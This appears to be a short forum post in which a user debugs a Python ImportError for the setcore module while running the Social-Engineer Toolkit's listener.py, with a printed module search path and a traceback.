I added a print statement to confirm the path and also added the src/core directory before the import was called, just in case. In all scenarios the listener is unable to find the setcore module. Reaching the limit of my python knowledge I am directing it back to the gurus, the relevant output with the debug print statement are below.

root@temp-msf2:/usr/share/setoolkit/src/payloads/set_payloads# python listener.py
['/usr/share/setoolkit/src/payloads/set_payloads', '/usr/lib/python2.7', '/usr/lib/python2.7/plat-linux2', '/usr/lib/python2.7/lib-tk', '/usr/lib/python2.7/lib-old', '/usr/lib/python2.7/lib-dynload', '/usr/local/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages', '/usr/share/setoolkit/src/core']
Traceback (most recent call last):
File "listener.py", line 16, in
from src.core.setcore import *
ImportError: No module named src.core.setcore .